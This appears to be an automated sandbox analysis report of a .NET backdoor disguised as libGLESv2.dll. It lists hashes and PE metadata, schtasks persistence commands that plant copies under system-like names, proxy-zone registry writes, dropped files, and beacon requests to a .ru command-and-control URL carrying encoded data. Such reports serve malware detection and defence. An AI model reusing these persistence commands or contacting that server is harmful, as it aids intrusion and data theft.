| File name: | 0ac3339350e0daa8432bd27bac74e4e7.exe |
| Full analysis: | https://app.any.run/tasks/98eee9f2-8c71-451d-a6c3-6ae992513929 |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | December 03, 2023, 00:07:58 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5: | 0AC3339350E0DAA8432BD27BAC74E4E7 |
| SHA1: | BA10F531F9197F2432D6042173DC5CEFA0EE8500 |
| SHA256: | 507444088FBB59E5E16DC1BB3DB1C638582003AAD2A46824AEA0CE74A73D472C |
| SSDEEP: | 12288:5yl71HGA8T2OvoXiY1aJaXZ4gAHFacIB9GjGHEWZEVjFsJ6:5yiWaJaXagAHFacIB9GjGHvZujFu6 |
| .exe | | | Generic CIL Executable (.NET, Mono, etc.) (45.1) |
|---|---|---|
| .exe | | | Win32 Executable MS Visual C++ (generic) (19.2) |
| .exe | | | Win64 Executable (generic) (17) |
| .scr | | | Windows screen saver (8) |
| .dll | | | Win32 Dynamic Link Library (generic) (4) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2022:05:04 18:03:35+02:00 |
| ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 6 |
| CodeSize: | 832512 |
| InitializedDataSize: | 13824 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xcd35e |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 5.15.2.0 |
| ProductVersionNumber: | 5.15.2.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Dynamic link library |
| FileSubtype: | - |
| LanguageCode: | English (U.S.) |
| CharacterSet: | Unicode |
| FileVersion: | 5.15.2.0 |
| OriginalFileName: | libGLESv2.dll |
| ProductName: | libGLESv2 |
| ProductVersion: | 5.15.2.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 116 | schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Application Data\audiodg.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 124 | schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Users\Public\dllhost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 308 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\nbjzFmbPFe.bat" " | C:\Windows\System32\cmd.exe | — | 0ac3339350e0daa8432bd27bac74e4e7.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 588 | schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\admin\Links\explorer.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 688 | schtasks.exe /create /tn "mscorsvwm" /sc MINUTE /mo 7 /tr "'C:\Windows\tracing\PowerTracker\mscorsvw.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 792 | schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Documents\My Music\smss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 908 | schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\debug\WIA\dllhost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1000 | schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\admin\Links\explorer.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1012 | schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Music\smss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1040 | w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 | C:\Windows\System32\w32tm.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Time Service Diagnostic Tool Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2604) 0ac3339350e0daa8432bd27bac74e4e7.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2604) 0ac3339350e0daa8432bd27bac74e4e7.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2604) 0ac3339350e0daa8432bd27bac74e4e7.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2604) 0ac3339350e0daa8432bd27bac74e4e7.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\Public\Favorites\42af1c969fbb7b | text | |
MD5:8DB01AEBB9F4583CA73CE2FE437AB5E8 | SHA256:B576AAC8E874BD041F1D62875123AE9F8DAB8F1E0FC791ED1E70C38744DBDE86 | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\Public\Music\smss.exe | executable | |
MD5:0AC3339350E0DAA8432BD27BAC74E4E7 | SHA256:507444088FBB59E5E16DC1BB3DB1C638582003AAD2A46824AEA0CE74A73D472C | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\Public\Idle.exe | executable | |
MD5:0AC3339350E0DAA8432BD27BAC74E4E7 | SHA256:507444088FBB59E5E16DC1BB3DB1C638582003AAD2A46824AEA0CE74A73D472C | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\Public\Music\69ddcba757bf72 | text | |
MD5:E132F13A0D8CD8CABD16B3C3D967F8B2 | SHA256:641029AD8992D8FC5A9DA4F66BC98EE3359D99C34BC4CDEB151596A3A86B0723 | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\Public\6ccacd8608530f | text | |
MD5:CDDACB06BD7239518D31D4B7458E9924 | SHA256:41E9FD1B4A96408C4D8594EE062FF36EA1F8AB566787EC1435C81C42A688FFF9 | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\Public\Favorites\audiodg.exe | executable | |
MD5:0AC3339350E0DAA8432BD27BAC74E4E7 | SHA256:507444088FBB59E5E16DC1BB3DB1C638582003AAD2A46824AEA0CE74A73D472C | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\IMEDICTUPDATE.exe | executable | |
MD5:0AC3339350E0DAA8432BD27BAC74E4E7 | SHA256:507444088FBB59E5E16DC1BB3DB1C638582003AAD2A46824AEA0CE74A73D472C | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Windows\debug\WIA\dllhost.exe | executable | |
MD5:0AC3339350E0DAA8432BD27BAC74E4E7 | SHA256:507444088FBB59E5E16DC1BB3DB1C638582003AAD2A46824AEA0CE74A73D472C | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\1173b9a28a9c10 | text | |
MD5:337966185E341B71572037C334C4C8AA | SHA256:5C95A5FBE0FE7AE673878B7C4FAEED2EC3D5F641866C2AC0691C35729DA6F35C | |||
| 2604 | 0ac3339350e0daa8432bd27bac74e4e7.exe | C:\Windows\debug\WIA\5940a34987c991 | text | |
MD5:C20237D08B556E999BAB2605AA5D3195 | SHA256:F4B1ABBCEDD53FEBB62FA3DAF27D5EFC9CA90D8DDCAF6B2C0A3C945FE1EBD562 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?CGOR4tStRPQ2JanKBv1Gj5R9iLQUbC=G8p1SXVdG&sKdAbtrTPQzb0XG=Otsd8SOAK4diUwqSvo1uy9HbjA&wZoHSud=muncZ6&86e6fa4d7a43c5c5225135e71ce77ecb=1dcf7141dc57f864933bbc1f1fee2874&c9774f48e65725e896c30c557e179a23=QZhVTZiBjY2Y2N2EjN3YDZwIDMmVDNwEWMmFTMhJjY4Y2NiNTN0UGN&CGOR4tStRPQ2JanKBv1Gj5R9iLQUbC=G8p1SXVdG&sKdAbtrTPQzb0XG=Otsd8SOAK4diUwqSvo1uy9HbjA&wZoHSud=muncZ6 | unknown | text | 2.09 Kb | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0EzMhdzNhFmM1QTY5MjZ4cjZ4QjYxgDOxEWMjZzMmNTMykTZhZDNlJiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 2.09 Kb | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&4a86d9030c2892e02704803188729bd1=d1nI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJxmWYFGMOdVUp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSpRVavpWS0ZkMZlmVyYles1WSzl0UXl2bqlEb1IjYvJ0MilnTXFmTOhVYpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMRl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxIVa3lWSPpUaPlGNXFGdSdVU6xWbJNXSplkNJlnUCJFbJNXSDRGcKVUSwkFRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiBHetNGbKBDTsJ0MilnVYJVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzl0UlVnRXJWeWJjUnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUarpmT3FlaMpXRExkMrRVTxQTaNFTSp9UaNJjYzp0QMlWVFJVavpWS1oESkVnVzImaKNETpRzVhNnSYp1QCNkW1Z0RUl2bqlUd5cVYuZVbjl2dplUdsdkY5ZVbRl2bqlUNShVYqp0QMlWSq5UdZR0T1lleOhHN51UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiIxMTYidTN0UDZkFWYlFTYhRGZzkTYzIWY3IWMwYmMmFWMiNzYjNDOwIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 104 b | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&5b0e10b75112fa51ee504c1639d325d3=QX9JCMulEaShVWFJUaiZHbHRGaOdVYzJESjJEeGhleKhlW6ZlRJNHeXF1Y4FzY5ZlMjZFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3NkYzZlbiZTSpNGbOhlV0Z0VaBjTsl0c3dkYxUTbPl2YtJGa4VlYoZ1RkRlSDxUawcVWsJ1MjZ3ap5ENnh0Sn1EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0EzMhdzNhFmM1QTY5MjZ4cjZ4QjYxgDOxEWMjZzMmNTMykTZhZDNlJiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 2.09 Kb | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&4a86d9030c2892e02704803188729bd1=d1nI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJxmWYFGMOdVUp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSpRVavpWS0ZkMZlmVyYles1WSzl0UXl2bqlEb1IjYvJ0MilnTXFmTOhVYpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMRl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxIVa3lWSPpUaPlGNXFGdSdVU6xWbJNXSplkNJlnUCJFbJNXSDRGcKVUSwkFRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiBHetNGbKBDTsJ0MilnVYJVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzl0UlVnRXJWeWJjUnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUarpmT3FlaMpXRExkMrRVTxQTaNFTSp9UaNJjYzp0QMlWVFJVavpWS1oESkVnVzImaKNETpRzVhNnSYp1QCNkW1Z0RUl2bqlUd5cVYuZVbjl2dplUdsdkY5ZVbRl2bqlUNShVYqp0QMlWSq5UdZR0T1lleOhHN51UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiIxMTYidTN0UDZkFWYlFTYhRGZzkTYzIWY3IWMwYmMmFWMiNzYjNDOwIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 104 b | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&4a86d9030c2892e02704803188729bd1=d1nI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJxmWYFGMOdVUp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSpRVavpWS0ZkMZlmVyYles1WSzl0UXl2bqlEb1IjYvJ0MilnTXFmTOhVYpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMRl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxIVa3lWSPpUaPlGNXFGdSdVU6xWbJNXSplkNJlnUCJFbJNXSDRGcKVUSwkFRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiBHetNGbKBDTsJ0MilnVYJVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzl0UlVnRXJWeWJjUnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUarpmT3FlaMpXRExkMrRVTxQTaNFTSp9UaNJjYzp0QMlWVFJVavpWS1oESkVnVzImaKNETpRzVhNnSYp1QCNkW1Z0RUl2bqlUd5cVYuZVbjl2dplUdsdkY5ZVbRl2bqlUNShVYqp0QMlWSq5UdZR0T1lleOhHN51UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiIxMTYidTN0UDZkFWYlFTYhRGZzkTYzIWY3IWMwYmMmFWMiNzYjNDOwIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W | unknown | text | 104 b | unknown |
2580 | audiodg.exe | GET | 200 | 141.8.192.58:80 | http://a0890495.xsph.ru/06642940.php?6v9x7ZG=J8HkklFpyvTCwoJr&AX9Q2DXR1U0Y5m3ZlmXzubbsQT2=7aRlS&85e70f37c9f93410332492a2a6342e22=wYhZjMzgzY1UWNyQDNiJGMmBTZ3YzYwYWY3EzY5IjYyYDN0EmZjZzNzcjN5UTM3ITNygjMxUjN&c9774f48e65725e896c30c557e179a23=QOhdjNilTM1UzM1ETM2QGMmVDOxMDOiZmY1U2MyYGNyQmNmJzYzQjM&4a86d9030c2892e02704803188729bd1=d1nI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNis3W&a6aa1328b12f475968aed5cd6ca8ff2d=0VfiIiOiYGN1gDM3YGZ5MGMzMmYyADNlV2YkFmMkVWM4UDOyUmMiwiI0ITOmR2MwEGO5AjN3UmN5I2Y2QmY4MTOiFTNwgTNkN2NzYGZ3Q2MxIiOiQDM5QTZ1EDOyEzY0IjY3Q2Y2UWOlNWMkJjYhZ2MlJ2YiwiIxE2MkZTZ2AjMhJzN2QTY4kzM4AzYhNDZhdjZ5YTOwQWZjNTZkZGN4IiOiYjN2EWZ4MDN2YmNklDZhBTZzUjMwAzN5IGZxEzY3ImNisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJxmWYFGMOdVUp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUajxGZXlVdGdFVnBzVZlHZyIWeCxWS2kUekZnUtJGckZkVEZ0aJNXSpRVavpWS0ZkMZlmVyYles1WSzl0UXl2bqlEb1IjYvJ0MilnTXFmTOhVYpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMRl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxIVa3lWSPpUaPlGNXFGdSdVU6xWbJNXSplkNJlnUCJFbJNXSDRGcKVUSwkFRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiBHetNGbKBDTsJ0MilnVYJVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzl0UlVnRXJWeWJjUnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUarpmT3FlaMpXRExkMrRVTxQTaNFTSp9UaNJjYzp0QMlWVFJVavpWS1oESkVnVzImaKNETpRzVhNnSYp1QCNkW1Z0RUl2bqlUd5cVYuZVbjl2dplUdsdkY5ZVbRl2bqlUNShVYqp0QMlWSq5UdZR0T1lleOhHN51UNFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoV